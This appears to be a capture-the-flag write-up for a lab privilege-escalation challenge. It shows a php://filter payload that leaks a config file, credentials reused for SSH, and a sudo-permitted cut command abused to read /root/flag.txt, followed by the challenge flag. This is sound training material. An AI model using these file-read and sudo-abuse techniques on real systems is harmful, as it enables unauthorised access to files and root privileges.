AUCHALL - [Privesc] - Intro Privesc
Challenge Description
Based on the credentials you got from Intro, it's time you escalate your privileges.
Solution
On running the following payload in Intro Web challenge we got credentials
php://filter/convert.base64-encode/resource=config.php
On decoding the base64 output we got database credentials
<?php
$host = "127.0.0.1";
$user = "the_user";
$pass = "%as21k.amu2SAVS51";
$db = "cy243l";
/*
In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords.
Do ping me once you've changed it.
*/
?>
Credentials
Username: the_user
Password: %as21k.amu2SAVS51
Using those credentials
ssh [email protected] -p PORT
First thing is to run sudo -l
We can run /usr/bin/cut
as sudo
Go to this site (opens in a new tab)
$ LFILE=/root/flag.txt
$ sudo cut -d "" -f1 "$LFILE"
Flag
Flag is dynamic
CY243L{sud0_-l_ftw_w1th_gtf0b1ns_EE3EC9f_6aUR_MPEy}
Writeups 2023 © RootxRAN.